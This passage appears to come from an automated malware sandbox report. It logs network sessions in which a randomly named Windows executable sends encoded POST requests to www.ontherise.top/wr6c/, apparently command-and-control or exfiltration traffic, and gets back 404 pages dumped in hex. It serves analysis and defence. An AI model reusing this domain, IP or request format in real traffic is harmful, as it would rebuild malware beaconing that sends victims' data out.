                                                                Data Ascii: 9rKHjDxP=C0xkLyGCgnKq4bAGlzAIr6c/v/GfxIx1tjIZLhcDrZ0FWI6yZnKwCGOrlPCByk1e1rT5REAIuWgeTGvXcs7ZpaMRwUeo1fYGNFRfDBShUYSOu/5eZnpuIDipoG3VHzJTFP7edish1eQx+xkWGaCVQ/jSlGabay4lsyf001YIPLRBaOHaQsQUUxxbkWJkfYZFJAbnZwYRd8ZKHZG22g==
                                                                Dec 11, 2024 15:05:25.110471964 CET1236INHTTP/1.1 404 Not Found
                                                                Date: Wed, 11 Dec 2024 14:05:24 GMT
                                                                Server: Apache
                                                                Content-Length: 16052
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                Dec 11, 2024 15:05:25.110522032 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                Dec 11, 2024 15:05:25.110558033 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                Dec 11, 2024 15:05:25.110594034 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                Dec 11, 2024 15:05:25.110630989 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                Dec 11, 2024 15:05:25.110663891 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                Dec 11, 2024 15:05:25.110697985 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                Dec 11, 2024 15:05:25.110732079 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                Dec 11, 2024 15:05:25.110778093 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                Dec 11, 2024 15:05:25.110805988 CET224INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                                                                Dec 11, 2024 15:05:25.230357885 CET1236INData Raw: 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterl


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.749993162.0.213.94804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:05:26.526210070 CET777OUTPOST /wr6c/ HTTP/1.1
                                                                Host: www.ontherise.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 241
                                                                Origin: http://www.ontherise.top
                                                                Referer: http://www.ontherise.top/wr6c/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 43 30 78 6b 4c 79 47 43 67 6e 4b 71 35 36 77 47 6e 51 6f 49 67 36 63 2b 67 66 47 66 37 6f 78 78 74 6a 4d 5a 4c 6c 6c 49 6f 72 51 46 57 74 47 79 59 6d 4b 77 42 47 4f 72 78 66 43 41 76 55 31 5a 31 71 76 78 52 47 55 49 75 58 45 65 54 47 2f 58 63 62 50 61 72 4b 4d 54 39 30 66 4f 78 66 59 47 4e 46 52 66 44 42 57 48 55 59 36 4f 76 50 70 65 59 47 70 74 4c 44 69 75 2f 32 33 56 44 7a 49 59 46 50 36 4c 64 6a 77 50 31 64 34 78 2b 78 55 57 47 50 69 57 65 2f 6a 55 36 57 62 66 54 51 35 32 73 79 4c 75 34 6e 6f 44 43 49 4e 48 62 34 47 34 4b 4f 63 34 4b 67 4a 67 67 55 74 53 49 2b 45 77 4c 42 66 2f 55 53 73 77 43 4c 38 67 4b 4c 6e 79 67 66 66 53 34 49 46 59 63 66 6a 44 6f 6c 6c 76 59 45 51 45 30 47 63 3d
                                                                Data Ascii: 9rKHjDxP=C0xkLyGCgnKq56wGnQoIg6c+gfGf7oxxtjMZLllIorQFWtGyYmKwBGOrxfCAvU1Z1qvxRGUIuXEeTG/XcbParKMT90fOxfYGNFRfDBWHUY6OvPpeYGptLDiu/23VDzIYFP6LdjwP1d4x+xUWGPiWe/jU6WbfTQ52syLu4noDCINHb4G4KOc4KgJggUtSI+EwLBf/USswCL8gKLnygffS4IFYcfjDollvYEQE0Gc=
                                                                Dec 11, 2024 15:05:27.755522013 CET1236INHTTP/1.1 404 Not Found
                                                                Date: Wed, 11 Dec 2024 14:05:27 GMT
                                                                Server: Apache
                                                                Content-Length: 16052
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                Dec 11, 2024 15:05:27.755563974 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                Dec 11, 2024 15:05:27.755578995 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                Dec 11, 2024 15:05:27.755597115 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                Dec 11, 2024 15:05:27.755620003 CET1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                Dec 11, 2024 15:05:27.755656958 CET1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                                Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                                Dec 11, 2024 15:05:27.755672932 CET1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                                Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                                Dec 11, 2024 15:05:27.755686998 CET108INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                                Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
                                                                Dec 11, 2024 15:05:27.755826950 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                Dec 11, 2024 15:05:27.755842924 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                                Dec 11, 2024 15:05:27.875495911 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                                Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.749994162.0.213.94804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:05:29.183300972 CET1790OUTPOST /wr6c/ HTTP/1.1
                                                                Host: www.ontherise.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 1253
                                                                Origin: http://www.ontherise.top
                                                                Referer: http://www.ontherise.top/wr6c/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 43 30 78 6b 4c 79 47 43 67 6e 4b 71 35 36 77 47 6e 51 6f 49 67 36 63 2b 67 66 47 66 37 6f 78 78 74 6a 4d 5a 4c 6c 6c 49 6f 72 59 46 52 62 53 79 65 46 53 77 41 47 4f 72 79 66 43 4e 76 55 31 45 31 72 48 31 52 47 6f 79 75 55 73 65 53 67 7a 58 65 75 6a 61 68 4b 4d 54 30 55 65 70 31 66 5a 45 4e 46 67 57 44 42 6d 48 55 59 36 4f 76 4b 6c 65 52 33 70 74 4e 44 69 70 6f 47 33 52 48 7a 4a 2f 46 50 79 62 64 6a 30 78 31 4d 59 78 39 52 45 57 45 38 4b 57 57 2f 6a 57 37 57 62 35 54 51 30 75 73 79 58 45 34 69 38 6c 43 4b 64 48 61 2f 72 6e 57 4d 74 6c 64 68 51 39 70 31 63 31 50 74 73 65 46 41 66 37 5a 51 52 53 65 62 59 76 47 64 58 74 31 5a 65 65 6c 70 4e 78 54 4e 75 55 6b 42 45 43 49 52 63 38 68 68 50 34 66 2f 2f 69 36 78 54 36 4d 61 36 62 34 78 48 41 6d 50 61 6a 41 46 32 48 49 58 38 4a 4c 79 4f 37 7a 54 67 4e 2f 58 41 2b 59 32 4e 42 53 4a 4d 4f 6e 6f 2f 67 32 49 41 30 72 63 62 6d 58 6f 63 47 67 6a 32 51 70 42 66 76 62 64 42 2b 74 56 74 39 58 4b 2f 47 4d 34 53 56 64 31 36 66 4e 65 42 54 74 [TRUNCATED]
                                                                Data Ascii: 9rKHjDxP=C0xkLyGCgnKq56wGnQoIg6c+gfGf7oxxtjMZLllIorYFRbSyeFSwAGOryfCNvU1E1rH1RGoyuUseSgzXeujahKMT0Uep1fZENFgWDBmHUY6OvKleR3ptNDipoG3RHzJ/FPybdj0x1MYx9REWE8KWW/jW7Wb5TQ0usyXE4i8lCKdHa/rnWMtldhQ9p1c1PtseFAf7ZQRSebYvGdXt1ZeelpNxTNuUkBECIRc8hhP4f//i6xT6Ma6b4xHAmPajAF2HIX8JLyO7zTgN/XA+Y2NBSJMOno/g2IA0rcbmXocGgj2QpBfvbdB+tVt9XK/GM4SVd16fNeBTtWaLl1bzE2+oJ0ogzbaptYAXGVnNpQoOL5VX0B91oybKkQgE9oWlvNyFr8+SO+Md5JdqDbxAPWre9OkN2fHEdT05ldrLrLnMXrwy6pRsNycHvfOiFKi+eD5h+OdQsZaVDnpl2uE65P1VwJ2IPXJT4bdQ8JO423YnY+zgEcpNJR120ITisRXiC836oiDgKnoyBNJjE97uCEvrFsv2Y+XGQM1gmS/roRP/cMza1u5uCrLGWKWkTQMEkHQKf585wS2W772fEr8vKGqC93XUWFTEAZvYmN3Z6+6/mkh1ObZqLDaGGTTNn65GeuHqGloQJuDWisB47lUqqJdjG9wMwBNMZDJ1liim3W+7Bj7OwPO6VbA7lVmXwT4h4EsYmgjpWcCWUC7auEybQmc7T7WmMn4oTazeFkpyeL2M+SKpo9xD7iz8acXS67T8CCd0RdZQ80pok8gsmILv18G2hnxtwFmOd49vWTIlMuYUu5S2ilX4IqHxWX23ZRD9mYb4Rjh6LpZDbQD5lmc7CwIbVXLnaj0ioGoKmTOvZJnUK6f5mNutqDKcvBAFBCF23BMV8cMnaY33liYbKtPXMHuUBwn+8se5E6aXE+yUqfx3nA+N9kAfQ+t80Nr+ev8eN3CkHkgkpcWGpS5MJ5eZ0HOgdmyaMz0uSpaFwDngLnEFWvz [TRUNCATED]
                                                                Dec 11, 2024 15:05:30.482270002 CET1236INHTTP/1.1 404 Not Found
                                                                Date: Wed, 11 Dec 2024 14:05:30 GMT
                                                                Server: Apache
                                                                Content-Length: 16052
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                Dec 11, 2024 15:05:30.482325077 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
